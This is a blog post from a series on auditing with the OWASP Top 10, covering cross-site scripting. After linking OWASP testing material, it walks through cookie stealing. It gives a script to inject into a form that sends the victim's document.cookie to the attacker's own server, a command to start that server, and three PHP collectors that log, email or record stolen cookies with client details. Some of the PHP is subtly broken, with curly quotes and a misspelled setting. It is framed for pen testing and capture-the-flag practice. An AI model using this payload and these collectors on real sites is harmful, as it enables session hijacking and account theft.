Tag: XSS

Posted on

[ Auditing With OWASP ] :: [ Vulnerability A7: Cross-Site Scripting XSS ]

This entry is part 4 of 4 in the series [ Auditing With the OWASP Top 10 ]

Vulnerability A7: Cross-Site Scripting XSS

XSS is oh, so useful for oh, so many things.

Here’s a summary:

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)

Practice and Process

Okay, start here:

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

You’ll see that the wiki is “retired”, and the new website (hopefully) holds all the old material too. We need:

XSS Filter Evasion Cheat Sheet
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Scan down the list of tests. It’s long, but really only goes about 1/3 of the way down the page. You could run these sample tests against a target in an afternoon, and if you’re doing serious pen testing, you will.

Once you are there, do a search in the page to highlight all occurrences of injection. Scroll down to the HTML and CSS injections. Open and read those sections.

While you’re at it, get used to the new interface. Check out this search, and notice how much stuff it will show for other testing areas:

https://owasp.org/search/?searchString=testing+for+xss

Here’s the description page:

https://owasp.org/www-community/attacks/xss/

Now scroll down to “How to Test for Cross-site scripting Vulnerabilities”. Look: they’ve done most of the research for you.

Cookie Stealing

This is a prime function of XSS. Here is it’s simplest form

You’re going to need:

  1. A little Javascript to paste into a form field, which links to your cookie stealer script.
  2. A little PHP (or pick any language) waiting on a web server for that Javascript to call for it.
  3. A log file to store cookies.

If you’re using Kali or any Linux with netcat installed, you’ve already got a simple web server that you can load like a mousetrap. Just open a terminal and cd to a directory where you can put your stealer script, and fire up a server:

python -m SimpleHTTPServer 5555

You can change the port from 5555 to anything you like. If you’re behind a router, you’ll need to forward this port to your testing box (Kali). Maybe don’t do this at home.

Javascript for Cookie Stealing

You’re going to have to test the injectability of the form you’re going to (ab)use, which is a topic for another article. But in its simplest form something like this will work:

<script>location.href = 'http://www.<your_IP>:5555/gimmecookies.php?cookie='+document.cookie;</script>

Obviously, you’ll need to fill in your IP address, and if you use a port other than 5555, change that here as well.

PHP for Cookie Stealing

Here are three simple ways to do it.

1. Create a file, paste in this code, and save it with the name gimmecookies.php in the directory where you started your web server.

<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$log = fopen(“gotcookies.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>

This is the simplest way to go, and is useful in some CTFs.

2. Email the cookie to yourself. This is going to require a victim with working email capabilities (not every site has them).

<?php
$cookie = $HTTP_GET_VARS[“cookie”]; 
mail(“<your_email>@<your_provider>.com”, “Got Cookies”, $cookie);
?>

3. Get the full information. This is highly useful if you’re going after more than just one cookie (as you often are in CTF situations).

<?php
function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”gotcookies.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();    $rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);    if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>”);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie nn”);
fclose($log);
}
logData();
?>

OWASP’s Discussion of Session Hijacking:

https://owasp.org/www-community/attacks/Session_hijacking_attack